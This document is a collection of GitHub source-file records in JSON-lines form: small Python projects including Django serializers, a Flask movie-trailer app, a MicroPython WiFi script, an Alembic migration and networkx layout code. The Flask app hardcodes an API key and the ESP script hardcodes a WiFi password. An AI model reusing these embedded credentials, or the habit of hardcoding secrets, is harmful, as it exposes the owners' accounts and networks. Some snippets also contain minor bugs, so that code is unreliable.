Please answer 'yes' or 'no'\")\n print(\"Congratulations, \" + name + \"!\")\n","repo_name":"sudo-ford/python-project-lvl1_1","sub_path":"brain_games/brain_even.py","file_name":"brain_even.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28760253933","text":"#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n# author:zhangjiao\r\nfrom day13.银行系统.atm import ATM\r\nimport time\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ATM.welcome()\r\n userDict={}\r\n while True:\r\n print(userDict)\r\n time.sleep(1)\r\n num = ATM.select()\r\n if num == \"2\":\r\n print(\"开户\")\r\n ATM.kaihu(userDict)\r\n elif num == \"1\":\r\n print(\"登陆\")\r\n login = ATM.login()\r\n\r\n","repo_name":"WayneChen1994/Python1805","sub_path":"day13/银行系统/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21426343002","text":"import logging\n\nimport arrow\n\nfrom bots.autocuratetag.tasks import CurateItemTask\nfrom share.bot import Bot\nfrom share.models import CeleryProviderTask\n\nfrom share.models import Tag\n\nlogger = logging.getLogger(__name__)\n\n\nclass AutoCurateBot(Bot):\n\n def run(self, last_run, dry=False):\n if not last_run:\n logger.debug('Finding last successful job')\n last_run = CeleryProviderTask.objects.filter(\n app_label=self.config.label,\n status=CeleryProviderTask.STATUS.succeeded,\n ).order_by(\n '-timestamp'\n ).values_list('timestamp', flat=True).first()\n if last_run:\n last_run = arrow.get(last_run)\n else:\n last_run = arrow.get(0)\n logger.info('Found last job %s', last_run)\n else:\n last_run = arrow.get(last_run)\n\n logger.info('Using last run of %s', last_run)\n self.do_curation(last_run)\n\n def do_curation(self, last_run: arrow.Arrow):\n submitted = set()\n\n qs = Tag.objects.filter(\n date_modified__gte=last_run.datetime,\n )\n\n total = qs.count()\n logger.info('Found %s tags eligible for automatic curation', total)\n\n for row in qs:\n if row.id in submitted:\n continue\n\n matches = list(\n Tag.objects.filter(\n name__iexact=row.name,\n ).order_by('-date_modified').values_list('id', flat=True)\n )\n\n if len(matches) > 1:\n submitted = submitted.union(set(matches))\n CurateItemTask().apply_async((self.config.label, self.started_by.id, matches,))\n","repo_name":"pattisdr/SHARE","sub_path":"bots/autocuratetag/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26610481321","text":"#!/usr/bin/env python\n# vi: set ft=python :\n\nimport os\nfrom twisted.application import service\nfrom buildbot.master import BuildMaster\n\n## bbmaster settings\nbbmaster_basedir = os.path.abspath(os.path.dirname(__file__))\nbbmaster_logdir = os.path.join(bbmaster_basedir, 'twistd.log')\nbbmaster_rotate_length = '10000000'\nbbmaster_max_rotated_files = '10'\nbbmaster_configfile = 'master.cfg'\nbbmaster_umask = None\n\n## create the application\napplication = service.Application('buildmaster')\n\n## add logging\ntry:\n from twisted.python.logfile import LogFile\n from twisted.python.log import ILogObserver, FileLogObserver\n logfile = LogFile.fromFullPath(bbmaster_logdir,\n rotateLength=bbmaster_rotate_length,\n maxRotatedFiles=bbmaster_max_rotated_files)\n application.setComponent(ILogObserver, FileLogObserver(logfile).emit)\nexcept ImportError:\n 
pass\n\n## create the master\nm = BuildMaster(bbmaster_basedir, bbmaster_configfile, bbmaster_umask)\nm.setServiceParent(application)\nm.log_rotation.rotateLength = bbmaster_rotate_length\nm.log_rotation.maxRotatedFiles = bbmaster_max_rotated_files\n","repo_name":"mhubig/globelog2-bbmaster","sub_path":"master/buildbot.tac","file_name":"buildbot.tac","file_ext":"tac","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6378453250","text":"#! /usr/bin/env python\n\nimport os\nimport ibis\nimport pandas as pd\n\ndef get_postgres_creds():\n kwargs = {\n 'host': os.environ['PGHOST'],\n 'user': os.environ['PGUSER'],\n 'password': os.environ['PGPASSWORD'],\n 'database': os.environ['PGDATABASE']\n }\n return kwargs\n\n\ndef get_postgres_ibis_connection():\n kwargs = get_postgres_creds()\n conn = ibis.postgres.connect(**kwargs)\n return conn\n\n\nconn = get_postgres_ibis_connection()\nconn.raw_sql(\"drop table if exists test\")\n\nconn.raw_sql(\"create table test (id bigserial primary key, x float)\")\n\nfor nn in range(10):\n df = pd.DataFrame({'x': [1., 2., 3.]})\n conn.insert('test', df)\n\nt = conn.table('test')\nprint()\nprint(t.execute().to_string())\n","repo_name":"robdmc/ibis_pg_test","sub_path":"doit.py","file_name":"doit.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7474224915","text":"\"\"\"\nAdvent Of Code 2021\nDay 6: Lanternfish part 1 & 2\n\nhttps://adventofcode.com/2021/day/6 \n\"\"\"\nimport os\n\ndef readInput(filename):\n with open(os.path.join(\"2021\", \"D06\", filename)) as f:\n lines = f.readlines()\n input = [int(i) for i in lines[0].strip('\\n').split(',')]\n return tuple(input)\n\ndef countFish(flock, numberOfDay):\n firstGeneration = list(flock)\n newGenerations = []\n for _ in range(numberOfDay):\n newFishCount = 0\n for i in range(len(firstGeneration)):\n if firstGeneration[i] > 0:\n firstGeneration[i] -= 1\n else:\n firstGeneration[i] = 6\n newFishCount += 1\n\n # one generation grow and reproduce at the same rate\n for ng in newGenerations:\n if ng[1] > 0:\n ng[1] -= 1\n else:\n ng[1] = 6\n newFishCount += ng[0]\n\n newGenerations.append([newFishCount, 8])\n\n fishCount = len(firstGeneration)\n fishCount += sum(map(lambda x: x[0], newGenerations))\n return fishCount\n\nsample = [3, 4, 3, 1, 2]\ninput = readInput(\"d6-input.txt\")\nprint(f\"Part 1, sample with 18 days: {countFish(sample, 18)}\")\nprint(f\"Part 1, sample with 80 days: {countFish(sample, 80)}\")\nprint(f\"Part 1, puzzle input with 80 days: {countFish(input, 80)}\")\n\nprint(f\"Part 2, sample with 256 days: {countFish(sample, 256)}\")\nprint(f\"Part 2, puzzle input with 256 days: {countFish(input, 256)}\")\n","repo_name":"lionel-lbr/adventofcode","sub_path":"2021/D06/d6.py","file_name":"d6.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9119654876","text":"from rest_framework import serializers\nimport random\nfrom .models import Scoreline, Tournament, Team, Player, Match\n\n\nclass TournamentSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n def create(self, validated_data):\n # Once the request data has been validated, we can create a todo item instance in the database\n T = Tournament.objects.create(name=validated_data.get('name'))\n for team in 
Team.objects.all():\n if team.name != 'Uncapped':\n T.team_set.add(team)\n team.save()\n return T\n def post(self, instance, data):\n I = data.get('Schedule')\n try:\n i = int(I)\n except:\n return instance\n if(i):\n instance.setschedule()\n instance.save()\n return instance\n def update(self, instance, validated_data):\n # Once the request data has been validated, we can update the todo item instance in the database\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n class Meta:\n model = Tournament\n fields = (\n 'id',\n 'name',\n 'match_num',\n 'scheduled',\n 'completed',\n 'team_set',\n 'match_set',\n )\nclass TeamSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n captain_name = serializers.SerializerMethodField('capname')\n wicketkeeper_name = serializers.SerializerMethodField('wicname')\n def capname(self, instance):\n return instance.player_set.all()[instance.captain].name\n def wicname(self, instance):\n return instance.player_set.all()[instance.wicketkeeper].name\n def create(self, validated_data):\n U = Team.objects.get(name='Uncapped')\n if U.player_set.count() < 11:\n return U\n else:\n T = Team.objects.create(name=validated_data.get('name'))\n if(str(validated_data.get('tournament')) != \"None\"):\n T.tournament = validated_data.get('tournament')\n else:\n pass\n for i in range(11):\n #print(\"Hi\")\n try:\n #print(U.player_set.all()[0])\n T.player_set.add(U.player_set.all()[0])\n T.save()\n U.player_set.all()[0].save()\n U.save()\n except:\n return U\n T.save()\n T.captain = random.randint(0,T.player_set.count() - 1)\n T.wicketkeeper = random.randint(0,T.player_set.count() - 1)\n T.save()\n return T\n def update(self, instance, validated_data):\n if(str(validated_data.get('name')) != \"None\"):\n instance.name = validated_data.get('name')\n else:\n pass\n instance.save()\n if(str(validated_data.get('tournament')) != \"None\"):\n instance.tournament = validated_data.get('tournament')\n else:\n pass\n instance.save()\n return instance\n\n class Meta:\n model = Team\n fields = [\n 'id',\n 'tournament',\n 'name',\n 'player_set',\n 'captain_name',\n 'wicketkeeper_name',\n 'win',\n 'loss',\n 'DNR',\n ]\nclass PlayerSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n def create(self, validated_data):\n T = Player.objects.create(name=validated_data.get('name'),age = validated_data.get('age'),role = validated_data.get('role'))\n if(str(validated_data.get('team')) != \"None\"):\n T.team = validated_data.get('team')\n else:\n pass\n if(str(validated_data.get('bat')) != \"None\"):\n T.bathandedness = str(validated_data.get('bat'))\n else:\n pass\n if(str(validated_data.get('ball')) != \"None\"):\n T.ballhandedness = validated_data.get('ball')\n else:\n pass\n T.save()\n if(str(validated_data.get('specs')) != \"None\"):\n T.specifics = validated_data.get('specs')\n else:\n T.specifics = 'None'\n T.save()\n return T\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.age = validated_data.get('age', instance.age)\n instance.team = validated_data.get('team', instance.team)\n instance.bathandedness = validated_data.get('bat', instance.bathandedness)\n instance.ballhandedness = validated_data.get('ball', instance.ballhandedness)\n instance.specifics = validated_data.get('specs', instance.soecifics)\n instance.role = validated_data.get('role', instance.role)\n instance.save()\n 
return instance\n class Meta:\n model = Player\n fields = (\n 'id',\n 'name',\n 'age',\n 'team',\n 'bathandedness',\n 'ballhandedness',\n 'specifics',\n 'role',\n '_1Ccount',\n '_5wcount',\n 'runcount',\n 'wickount',\n 'catcount',\n '_50count',\n )\nclass MatchSerializer(serializers.ModelSerializer):\n team_names = serializers.SerializerMethodField('team_name')\n scoreline_set = serializers.SerializerMethodField('scorer')\n def team_name(self, instance):\n L = []\n for i in instance.playing11_set.all():\n L.append(i.team.name)\n return L\n def scorer(self, instance):\n L = []\n for i in instance.playing11_set.all():\n M = []\n for j in i.scoreline_set.all():\n S = []\n for k in j.playerinline_set.all():\n S.append((k.player.name,k.role))\n M.append(S)\n M.append([j.run, j.ballfaced, j.out, j.outdesc])\n L.append(M)\n return L\n def update(self, instance):\n instance.generate()\n instance.save()\n return instance\n class Meta:\n model = Match\n fields = (\n 'id',\n 'date',\n 'winner',\n 'result',\n 'tournament',\n 'scoreline_set',\n 'playing11_set',\n 'team_names',\n )\nclass StatSerializer(serializers.ModelSerializer):\n class Meta:\n model = Player\n fields = (\n 'id',\n 'name',\n 'age',\n 'team',\n 'bathandedness',\n 'ballhandedness',\n 'specifics',\n 'role',\n '_1Ccount',\n '_5wcount',\n 'runcount',\n 'wickount',\n 'catcount',\n '_50count',\n )\n","repo_name":"chirag-ghosh/rickly","sub_path":"backend/team/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"35771128377","text":"from flask import Flask, render_template\nimport requests\n\nfrom model.media import Movie\nfrom model.video import Video\n\napp = Flask(__name__)\n\nURL = 'https://api.themoviedb.org/'\nPARAMS = {'api_key': '60dbe1af2d9d27a66e65f26e2ec0db7a', 'page': 1}\n\n#list of movies cached in global variables to avoid reloading api\nmoviesTopRated = []\nmoviesPopular = []\nmoviesNowPlaying = []\nmoviesUpcoming = []\n\n#movie id and video dictionary cache\ntrailerKeysDict = {}\n\n\n@app.route('/')\n@app.route('/home/')\ndef home():\n global moviesTopRated\n if len(moviesTopRated) == 0: #if list has no items cached, load movies\n moviesTopRated = getMovies('3/movie/top_rated/')\n return render_template('index.html', movies=moviesTopRated, pageHeading='Top Rated')\n\n\n@app.route('/popular/')\ndef popular():\n global moviesPopular\n if len(moviesPopular) == 0: #if list has no items cached, load movies\n moviesPopular = getMovies('3/movie/popular/')\n return render_template('index.html', movies=moviesPopular, pageHeading='Popular')\n\n\n@app.route('/now/')\ndef now_playing():\n global moviesNowPlaying\n if len(moviesNowPlaying) == 0: #if list has no items cached, load movies\n moviesNowPlaying = getMovies('3/movie/now_playing/')\n return render_template('index.html', movies=moviesNowPlaying, pageHeading='Now Playing')\n\n\n@app.route('/upcoming/')\ndef upcoming():\n global moviesUpcoming\n if len(moviesUpcoming) == 0: #if list has no items cached, load movies\n moviesUpcoming = getMovies('3/movie/upcoming/')\n return render_template('index.html', movies=moviesUpcoming, pageHeading='Upcoming')\n\n\n@app.route('/trailer/')\ndef loadTrailer(id):\n global trailerKeysDict\n if (id not in trailerKeysDict): #if dict does not have this id as key, load data\n tRequest = requests.get(url=URL + '3/movie/' + str(id) + '/videos', params=PARAMS)\n data = tRequest.json()['results']\n for item in 
data:\n if (item['site'] == 'YouTube'): #make sure its a youtube result\n trailerKeysDict[id] = Video(item['id'], item['key'], item['name'], item['site'], item['type']) #add Video item in dictionary with respective id as key\n return render_template('trailer.html', video=trailerKeysDict[id])\n return 'Oops, No trailer found!
' #if api returned empty results\n\n\ndef getMovies(route):\n request = requests.get(url=URL + route, params=PARAMS)\n data = request.json()['results']\n movies = [] #list of movies to be returned\n for item in data:\n movies.append(Movie(item['id'], item['title'], item['poster_path'], item['overview'], item['vote_average'])) #add movie item to list\n return movies\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"amansharma93/Movie-Trailer-Website","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2755924399","text":"\"\"\"\nBecause GET requests can't have bodies, and we need one to filter the results of the list\naction, the standard CRUD routes are redefined here to support this.\n\nOriginal definitions: rest_framework/routers.py\n\"\"\"\nfrom rest_framework.routers import Route\n\n# The standard CRUD routes\nSTANDARD_CRUD_ROUTES = [\n # List route.\n Route(\n url=r'^{prefix}/list{trailing_slash}$',\n mapping={\n 'post': 'list'\n },\n name='{basename}-list',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Create route.\n Route(\n url=r'^{prefix}/create{trailing_slash}$',\n mapping={\n 'post': 'create'\n },\n name='{basename}-create',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Detail route.\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n },\n name='{basename}-detail',\n detail=True,\n initkwargs={'suffix': 'Instance'}\n )\n]\n","repo_name":"waikato-ufdl/ufdl-backend","sub_path":"ufdl-core-app/src/ufdl/core_app/routers/_standard_routes.py","file_name":"_standard_routes.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6104944882","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n # locations\n path(\"location\", views.LocationList.as_view()),\n path(\"location/\", views.LocationDetail.as_view()),\n # iseeya_users \n path(\"iseeya_user\", views.ISeeYaUserList.as_view()),\n path(\"iseeya_user/\", views.ISeeYaUserDetail.as_view()),\n # profiles\n path(\"profile\", views.ProfileList.as_view()),\n path(\"profile/\", views.ProfileDetail.as_view()),\n # iseeya_maps\n path(\"iseeya_map\", views.ISeeYaMapList.as_view()),\n path(\"iseeya_map/\", views.ISeeYaMapDetail.as_view()),\n # marker\n path(\"marker\", views.MarkerList.as_view()),\n path(\"marker/\", views.MarkerDetail.as_view()),\n # users\n path(\"get_iseeya_user\", views.get_iseeya_user)\n]","repo_name":"jmacach1/social_media_backend","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5885338590","text":"# Elias Zell\n# Crash 1\n\nimport time \nimport digitalio \nimport board \nimport adafruit_mpu6050\nimport busio\n\nsda_pin = board.GP14\nscl_pin = board.GP15\ni2c = busio.I2C(scl_pin, sda_pin)\n\nmpu = adafruit_mpu6050.MPU6050(i2c) \n\nmpu.acceleration \nmpu.gyro\n\nwhile True: \n \n print(f\"X Acceleration: {mpu.acceleration[0]} m/s2\") #Print the X coordinate of the accelerometer\n print(f\"Y Acceleration: {mpu.acceleration[1]} m/s2\") #Print the Y coordinate of the accelerometer\n print(f\"Z Acceleration: {mpu.acceleration[2]} m/s2\") #Print the Z coordinate of the accelerometer\n print(\"\") \n \n print(\"\") #Prints everything you just wrote above \n time.sleep(1) ","repo_name":"ezell38/Engineering_4_Notebook","sub_path":"raspberry-pi/Crash_1.py","file_name":"Crash_1.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37272188815","text":"from io import StringIO\n\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom django_celery_beat.models import PeriodicTask\n\nfrom .factories import SafeFundingFactory\n\n\nclass TestCommands(TestCase):\n def test_check_safes(self):\n buf = StringIO()\n call_command('check_safes', stdout=buf)\n self.assertIn('All safes are deployed', buf.getvalue())\n\n safe_funding = SafeFundingFactory(safe_deployed=False)\n call_command('check_safes', stdout=buf)\n self.assertIn('Safe=%s Status=%s' % (safe_funding.safe_id, safe_funding.status()),\n buf.getvalue())\n\n def test_deploy_pending_safes(self):\n buf = StringIO()\n call_command('deploy_pending_safes', stdout=buf)\n self.assertIn('All safes are deployed', buf.getvalue())\n\n def test_deploy_safe_contracts(self):\n buf = StringIO()\n call_command('deploy_safe_contracts', stdout=buf)\n self.assertEqual(buf.getvalue().count('Contract has been deployed on'), 3)\n\n def test_send_slack_notification(self):\n buf = StringIO()\n call_command('send_slack_notification', stdout=buf)\n text = buf.getvalue()\n self.assertIn('Slack not configured, ignoring', text)\n self.assertIn('Starting Safe Relay Service version', text)\n\n def test_setup_service(self):\n from ..management.commands.setup_service import Command\n number_tasks = len(Command.tasks)\n self.assertEqual(PeriodicTask.objects.all().count(), 0)\n call_command('setup_service')\n self.assertEqual(PeriodicTask.objects.all().count(), 
number_tasks)\n","repo_name":"vaporyorg/safe-relay-service","sub_path":"safe_relay_service/relay/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72093307921","text":"import network\r\nimport time\r\nimport gc\r\n\r\nsta_if = network.WLAN(network.STA_IF)\r\nsta_if.active(True)\r\n#sta_if.scan() # Scan for available access points\r\nsta_if.connect(\"fablab-wue\", \"cwurzdfi\") # Connect to an AP\r\nwhile not sta_if.isconnected(): # Check for successful connection\r\n time.sleep(0.5)\r\n print ('Waiting for connection...')\r\n\r\nprint ('Connected!')\r\n\r\ngc.collect()\r\nprint (gc.mem_free())\r\n","repo_name":"fablab-wue/ezPiC.Device.OLD","sub_path":"esp/ESP.py","file_name":"ESP.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"13604549216","text":"\"\"\"Initial\n\nRevision ID: 14e832752423\nRevises: None\nCreate Date: 2022-09-14 15:30:49.539549\n\n\"\"\"\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '14e832752423'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n 'history',\n sa.Column('uid', sa.String(), nullable=False),\n sa.Column('size', sa.Integer(), nullable=False),\n sa.Column('update_date', sa.DateTime(), nullable=False),\n sa.UniqueConstraint(\n 'uid', 'update_date',\n name='uix_obj_history_change'\n )\n )\n op.create_table(\n 'relations',\n sa.Column('relation_id', sa.String(), nullable=False),\n sa.Column('children_id', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint(\n 'relation_id',\n 'children_id',\n name=op.f('pk__relations')\n ),\n sa.UniqueConstraint(\n 'relation_id',\n 'children_id',\n name='uix_pair_children_parent'\n )\n )\n op.create_table(\n 'units',\n sa.Column('uid', sa.String(), nullable=False),\n sa.Column('url', sa.String(), nullable=True),\n sa.Column('date', sa.DateTime(), nullable=False),\n sa.Column(\n 'type', sa.Enum('file', 'folder', name='type'), nullable=False),\n sa.Column('size', sa.Integer(), nullable=True),\n sa.Column('parent_id', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('uid', name=op.f('pk__units'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n pass\n # ### end Alembic commands ###\n","repo_name":"AlexandrVino/BackendSchoolAutumn2022","sub_path":"disk/db/migrations/versions/14e832752423_initial.py","file_name":"14e832752423_initial.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19236031932","text":"import networkx as nx\n__author__ = \"\"\"Aric Hagberg (hagberg@lanl.gov)\\nDan Schult(dschult@colgate.edu)\"\"\"\n__all__ = ['circular_layout',\n 'random_layout',\n 'shell_layout',\n 'spring_layout',\n 'spectral_layout',\n 'fruchterman_reingold_layout']\n\ndef random_layout(G,dim=2):\n \"\"\"Position nodes uniformly at random in the unit square.\n\n For every node, a position is generated by choosing each of dim\n coordinates uniformly at random on the interval [0.0, 1.0).\n\n NumPy (http://scipy.org) is required for this function.\n\n Parameters\n ----------\n G : NetworkX graph\n A position will be assigned to every node in G.\n\n dim : int\n Dimension of layout.\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G = nx.lollipop_graph(4, 3)\n >>> pos = nx.random_layout(G)\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"random_layout() requires numpy: http://scipy.org/ \")\n n=len(G)\n pos=np.asarray(np.random.random((n,dim)),dtype=np.float32)\n return dict(zip(G,pos))\n\n\ndef circular_layout(G, dim=2, scale=1):\n # dim=2 only\n \"\"\"Position nodes on a circle.\n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout, currently only dim=2 is supported\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.circular_layout(G)\n\n Notes\n ------\n This algorithm currently only works in two dimensions and does not\n try to minimize edge crossings.\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"circular_layout() requires numpy: http://scipy.org/ \")\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n t=np.arange(0,2.0*np.pi,2.0*np.pi/len(G),dtype=np.float32)\n pos=np.transpose(np.array([np.cos(t),np.sin(t)]))\n pos=_rescale_layout(pos,scale=scale)\n return dict(zip(G,pos))\n\ndef shell_layout(G,nlist=None,dim=2,scale=1):\n \"\"\"Position nodes in concentric circles.\n\n Parameters\n ----------\n G : NetworkX graph\n\n nlist : list of lists\n List of node lists for each shell.\n\n dim : int\n Dimension of layout, currently only dim=2 is supported\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> shells=[[0],[1,2,3]]\n >>> pos=nx.shell_layout(G,shells)\n\n Notes\n ------\n This algorithm currently only works in two dimensions and does not\n try to minimize edge crossings.\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"shell_layout() requires numpy: http://scipy.org/ \")\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n if nlist==None:\n nlist=[G.nodes()] # draw the whole graph in one shell\n\n if len(nlist[0])==1:\n radius=0.0 # single node at center\n else:\n radius=1.0 # else start at r=1\n\n npos={}\n for nodes in nlist:\n t=np.arange(0,2.0*np.pi,2.0*np.pi/len(nodes),dtype=np.float32)\n 
pos=np.transpose(np.array([radius*np.cos(t),radius*np.sin(t)]))\n npos.update(zip(nodes,pos))\n radius+=1.0\n\n # FIXME: rescale\n return npos\n\n\ndef fruchterman_reingold_layout(G,dim=2,\n pos=None,\n fixed=None,\n iterations=50,\n weight='weight',\n scale=1):\n \"\"\"Position nodes using Fruchterman-Reingold force-directed algorithm. \n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout\n\n pos : dict or None optional (default=None)\n Initial positions for nodes as a dictionary with node as keys\n and values as a list or tuple. If None, then nuse random initial\n positions.\n\n fixed : list or None optional (default=None)\n Nodes to keep fixed at initial position.\n\n iterations : int optional (default=50)\n Number of iterations of spring-force relaxation\n\n weight : string or None optional (default='weight')\n The edge attribute that holds the numerical value used for\n the edge weight. If None, then all edge weights are 1.\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.spring_layout(G)\n\n # The same using longer function name\n >>> pos=nx.fruchterman_reingold_layout(G)\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"fruchterman_reingold_layout() requires numpy: http://scipy.org/ \")\n if fixed is not None:\n nfixed=dict(zip(G,range(len(G))))\n fixed=np.asarray([nfixed[v] for v in fixed])\n\n if pos is not None:\n pos_arr=np.asarray(np.random.random((len(G),dim)))\n for i,n in enumerate(G):\n if n in pos:\n pos_arr[i]=np.asarray(pos[n])\n else:\n pos_arr=None\n\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n\n try:\n # Sparse matrix\n if len(G) < 500: # sparse solver for large graphs\n raise ValueError\n A=nx.to_scipy_sparse_matrix(G,weight=weight)\n pos=_sparse_fruchterman_reingold(A,dim,pos_arr,fixed,iterations)\n except:\n A=nx.to_numpy_matrix(G,weight=weight)\n pos=_fruchterman_reingold(A,dim,pos_arr,fixed,iterations)\n if fixed is None:\n pos=_rescale_layout(pos,scale=scale)\n return dict(zip(G,pos))\n\nspring_layout=fruchterman_reingold_layout\n\ndef _fruchterman_reingold(A, dim=2, pos=None, fixed=None, iterations=50):\n # Position nodes in adjacency matrix A using Fruchterman-Reingold\n # Entry point for NetworkX graph is fruchterman_reingold_layout()\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"_fruchterman_reingold() requires numpy: http://scipy.org/ \")\n\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\n \"fruchterman_reingold() takes an adjacency matrix as input\")\n\n A=np.asarray(A) # make sure we have an array instead of a matrix\n\n if pos==None:\n # random initial positions\n pos=np.asarray(np.random.random((nnodes,dim)),dtype=A.dtype)\n else:\n # make sure positions are of same type as matrix\n pos=pos.astype(A.dtype)\n\n # optimal distance between nodes\n k=np.sqrt(1.0/nnodes)\n # the initial \"temperature\" is about .1 of domain area (=1x1)\n # this is the largest step allowed in the dynamics.\n t=0.1\n # simple cooling scheme.\n # linearly step down by dt on each iteration so last iteration is size dt.\n dt=t/float(iterations+1)\n delta = np.zeros((pos.shape[0],pos.shape[0],pos.shape[1]),dtype=A.dtype)\n # the inscrutable (but fast) version\n # this is still O(V^2)\n # could use multilevel methods to speed this up significantly\n for iteration in range(iterations):\n # matrix of 
difference between points\n for i in range(pos.shape[1]):\n delta[:,:,i]= pos[:,i,None]-pos[:,i]\n # distance between points\n distance=np.sqrt((delta**2).sum(axis=-1))\n # enforce minimum distance of 0.01\n distance=np.where(distance<0.01,0.01,distance)\n # displacement \"force\"\n displacement=np.transpose(np.transpose(delta)*\\\n (k*k/distance**2-A*distance/k))\\\n .sum(axis=1)\n # update positions\n length=np.sqrt((displacement**2).sum(axis=1))\n length=np.where(length<0.01,0.1,length)\n delta_pos=np.transpose(np.transpose(displacement)*t/length)\n if fixed is not None:\n # don't change positions of fixed nodes\n delta_pos[fixed]=0.0\n pos+=delta_pos\n # cool temperature\n t-=dt\n\n return pos\n\n\ndef _sparse_fruchterman_reingold(A, dim=2, pos=None, fixed=None, iterations=50):\n # Position nodes in adjacency matrix A using Fruchterman-Reingold \n # Entry point for NetworkX graph is fruchterman_reingold_layout()\n # Sparse version\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"_sparse_fruchterman_reingold() requires numpy: http://scipy.org/ \")\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\n \"fruchterman_reingold() takes an adjacency matrix as input\")\n try:\n from scipy.sparse import spdiags,coo_matrix\n except ImportError:\n raise ImportError(\"_sparse_fruchterman_reingold() scipy numpy: http://scipy.org/ \")\n # make sure we have a LIst of Lists representation\n try:\n A=A.tolil()\n except:\n A=(coo_matrix(A)).tolil()\n\n if pos==None:\n # random initial positions\n pos=np.asarray(np.random.random((nnodes,dim)),dtype=A.dtype)\n else:\n # make sure positions are of same type as matrix\n pos=pos.astype(A.dtype)\n\n # no fixed nodes\n if fixed==None:\n fixed=[]\n\n # optimal distance between nodes\n k=np.sqrt(1.0/nnodes)\n # the initial \"temperature\" is about .1 of domain area (=1x1)\n # this is the largest step allowed in the dynamics.\n t=0.1\n # simple cooling scheme.\n # linearly step down by dt on each iteration so last iteration is size dt.\n dt=t/float(iterations+1)\n\n displacement=np.zeros((dim,nnodes))\n for iteration in range(iterations):\n 